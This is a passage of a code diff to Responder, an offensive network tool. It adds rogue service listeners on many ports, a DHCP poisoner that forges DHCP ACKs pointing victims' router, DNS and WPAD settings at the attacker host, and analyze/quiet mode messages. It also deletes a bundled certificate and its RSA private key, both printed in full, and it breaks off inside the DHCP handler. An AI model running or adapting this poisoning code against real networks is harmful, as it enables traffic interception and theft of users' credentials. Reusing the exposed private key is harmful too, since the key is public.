-		threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138,  Browser,)))
+		#from servers.Browser import Browser
+		#threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138,  Browser,)))
 
 		if settings.Config.HTTP_On_Off:
 			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
 
 		if settings.Config.SSL_On_Off:
 			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTP,)))
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
+
+		if settings.Config.RDP_On_Off:
+			from servers.RDP import RDP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,)))
+
+		if settings.Config.DCERPC_On_Off:
+			from servers.RPC import RPCMap, RPCMapper
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,)))
 
 		if settings.Config.WPAD_On_Off:
 			from servers.HTTP_Proxy import HTTP_Proxy
-			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
 
 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
 
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,)))
 			else:
 				from servers.SMB import SMB1
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
+
+		if settings.Config.QUIC_On_Off:
+			from servers.QUIC import start_quic_server
+			cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			threads.append(Thread(target=lambda: asyncio.run(start_quic_server(settings.Config.Bind_To, cert, key))))
 
 		if settings.Config.Krb_On_Off:
 			from servers.Kerberos import KerbTCP, KerbUDP
 			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,)))
 
 		if settings.Config.SQL_On_Off:
 			from servers.MSSQL import MSSQL, MSSQLBrowser
-			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
-			threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,)))
 
 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,)))
 
 		if settings.Config.POP_On_Off:
 			from servers.POP3 import POP3
-			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,)))
 
 		if settings.Config.LDAP_On_Off:
-			from servers.LDAP import LDAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
+			from servers.LDAP import LDAP, CLDAP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,)))
+			threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))
+
+		if settings.Config.MQTT_On_Off:
+			from servers.MQTT import MQTT
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,)))
 
 		if settings.Config.SMTP_On_Off:
 			from servers.SMTP import ESMTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25,  ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,)))
 
 		if settings.Config.IMAP_On_Off:
 			from servers.IMAP import IMAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))
+			from servers.IMAP import IMAPS
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 993, IMAPS,)))
+
 
 		if settings.Config.DNS_On_Off:
 			from servers.DNS import DNS, DNSTCP
 			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
 			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
 
+		if settings.Config.SNMP_On_Off:
+			from servers.SNMP import SNMP
+			threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,)))
+
 		for thread in threads:
-			thread.setDaemon(True)
+			thread.daemon = True
 			thread.start()
 
-		print color('[+]', 2, 1) + " Listening for events..."
+		if settings.Config.AnalyzeMode:
+			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+		if settings.Config.Quiet_Mode:
+			print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1))
+			
+
+		if settings.Config.DHCP_On_Off:
+			from poisoners.DHCP import DHCP
+			DHCP(settings.Config.DHCP_DNS)
 
 		while True:
 			time.sleep(1)
 
 	except KeyboardInterrupt:
+		# Optional: Print DHCPv6 statistics on shutdown
+		if settings.Config.DHCPv6_On_Off:
+			try:
+				from servers.DHCPv6 import print_dhcpv6_stats
+				print_dhcpv6_stats()
+			except:
+				raise
+				pass
 		sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
 
 if __name__ == '__main__':

certs/gen-self-signed-cert.sh

@@ -1,3 +1,3 @@
 #!/bin/bash
-openssl genrsa -out responder.key 2048
-openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"
+openssl genrsa -out certs/responder.key 2048
+openssl req -new -x509 -days 3650 -key certs/responder.key -out certs/responder.crt -subj "/"

certs/responder.crt

@@ -1,18 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
-NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
-AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
-YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
-6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
-YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
-koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
-4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
-YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
-HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
-u0/CRCN/lg==
------END CERTIFICATE-----

certs/responder.key

@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
-1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
-kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
-YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
-FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
-erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
-IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
-nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
-LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
-cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
-5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
-s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
-ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
-VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
-AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
-HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
-VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
-kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
-f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
-MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
------END RSA PRIVATE KEY-----

fingerprint.py

@@ -1,62 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
-import struct
-
-from utils import color
-from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
-
-def OsNameClientVersion(data):
-	try:
-		length = struct.unpack('<H',data[43:45])[0]
-		pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
-		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
-		return OsVersion, ClientVersion
-	except:
-	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
-
-def RunSmbFinger(host):
-	try:
-		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-		s.connect(host)
-		s.settimeout(0.7)
-
-		h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
-		n = SMBNego(data = SMBNegoFingerData())
-		n.calculate()
-		
-		Packet = str(h)+str(n)
-		Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-		s.send(Buffer)
-		data = s.recv(2048)
-		
-		if data[8:10] == "\x72\x00":
-			Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
-			Body = SMBSessionFingerData()
-			Body.calculate()
-
-			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet)))+Packet  
-
-			s.send(Buffer) 
-			data = s.recv(2048)
-
-		if data[8:10] == "\x73\x16":
-			return OsNameClientVersion(data)
-	except:
-		print color("[!] ", 1, 1) +" Fingerprint failed"
-		return None

odict.py

@@ -1,20 +1,12 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from UserDict import DictMixin
+import sys
+try:
+    from UserDict import DictMixin
+except ImportError:
+    from collections import UserDict
+    try:
+        from collections import MutableMapping as DictMixin
+    except ImportError:
+        from collections.abc import MutableMapping as DictMixin
 
 class OrderedDict(dict, DictMixin):
 
@@ -30,7 +22,7 @@ class OrderedDict(dict, DictMixin):
     def clear(self):
         self.__end = end = []
         end += [None, end, end]
-        self.__map = {}
+        self.__map = {} 
         dict.clear(self)
 
     def __setitem__(self, key, value):
@@ -77,20 +69,30 @@ class OrderedDict(dict, DictMixin):
         inst_dict = vars(self).copy()
         self.__map, self.__end = tmp
         if inst_dict:
-            return self.__class__, (items,), inst_dict
+            return (self.__class__, (items,), inst_dict)
         return self.__class__, (items,)
 
     def keys(self):
         return list(self)
 
-    setdefault = DictMixin.setdefault
-    update = DictMixin.update
-    pop = DictMixin.pop
-    values = DictMixin.values
-    items = DictMixin.items
-    iterkeys = DictMixin.iterkeys
-    itervalues = DictMixin.itervalues
-    iteritems = DictMixin.iteritems
+    if sys.version_info >= (3, 0):
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.keys
+        itervalues = DictMixin.values
+        iteritems = DictMixin.items
+    else:
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.iterkeys
+        itervalues = DictMixin.itervalues
+        iteritems = DictMixin.iteritems
 
     def __repr__(self):
         if not self:
@@ -115,3 +117,8 @@ class OrderedDict(dict, DictMixin):
 
     def __ne__(self, other):
         return not self == other
+
+
+if __name__ == '__main__':
+    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

poisoners/DHCP.py

@@ -0,0 +1,354 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
+
+import struct
+import random
+import optparse
+import configparser
+import os
+import codecs
+import netifaces
+import binascii
+
+BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
+sys.path.insert(0, BASEDIR)
+from odict import OrderedDict
+from utils import *
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+config = configparser.ConfigParser()
+config.read(os.path.join(BASEDIR,'Responder.conf'))
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
+Interface           = settings.Config.Interface
+Responder_IP        = RespondWithIP()
+ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
+NETMASK             = "255.255.255.0"
+DNSIP               = "0.0.0.0"
+DNSIP2              = "0.0.0.0"
+DNSNAME             = "local"
+WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
+Respond_To_Requests = True
+DHCPClient          = []
+
+def GetMacAddress(Interface):
+	try:
+		mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
+		return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+	except:
+		mac = "00:00:00:00:00:00"
+		return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+		
+##### IP Header #####
+class IPHead(Packet):
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
+
+class UDP(Packet):
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
+
+class DHCPDiscover(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x01"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               os.urandom(4).decode('latin-1')),
+            ("ElapsedSec",        "\x00\x01"),
+            ("BootpFlags",        "\x80\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         os.urandom(6).decode('latin-1')),#Needs to be random.
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x01"),              #Msgtype(Discover)
+            ("Op55",              "\x37"),
+            ("Op55Len",           "\x0b"),
+            ("Op55Str",           "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
+            ("Op12",              "\x0c"),
+            ("Op12Len",           "\x09"),
+            ("Op12Str",           settings.Config.DHCPHostname),#random str.
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["ClientMac"] = GetMacAddress(Interface)
+
+class DHCPACK(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x00\x00\x0a"),  #Lease time
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             ""),
+            ("Op252Len",          ""),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self, DHCP_DNS):
+        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        if DHCP_DNS:
+               self.fields["Op6Str"]   = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        else:
+               self.fields["Op252"]    = "\xfc"
+               self.fields["Op252Str"] = WPADSRV
+               self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+        
+        self.fields["Op51Str"]  = StructWithLenPython2or3('>L', random.randrange(10, 20))
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+
+def RespondToThisIP(ClientIp):
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
+
+def ParseSrcDSTAddr(data):
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort
+
+def FindIP(data):
+    IPPos = data.find(b"\x32\x04") + 2
+    if IPPos == -1 or IPPos + 4 >= len(data) or IPPos == 1:
+        #Probably not present in the DHCP options we received, let's grab it from the IP header instead
+        return data[12:16]
+    else:
+        IP = data[IPPos:IPPos+4]
+        return IP
+
+def ParseDHCPCode(data, ClientIP,DHCP_DNS):
+    global DHCPClient
+    global ROUTERIP
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
+    
+    if DHCPClient.count(MacAddrStr) >= 4:
+        return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+
+    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
+        ROUTERIP = ClientIP
+        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate(DHCP_DNS)
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                DHCPClient.append(MacAddrStr)
+                SaveDHCPToDb({
+                              'MAC': MacAddrStr, 
+                              'IP': CurrentIP, 
+                              'RequestedIP': IPConv,
+                             })
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+                
+    # DHCP Inform
+    elif OpCode == b"\x08":
+        IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP).decode('latin-1'))
+        Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'),
+                                                        GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        ElapsedSec=Seconds.decode('latin-1'))
+        Packet.calculate(DHCP_DNS)
+        Buffer = UDP(Data = Packet)
+        Buffer.calculate()
+        SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
+        DHCPClient.append(MacAddrStr)
+        SaveDHCPToDb({
+                      'MAC': MacAddrStr, 
+                      'IP': CurrentIP, 
+                      'RequestedIP': RequestedIP,
+                      })
+        return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
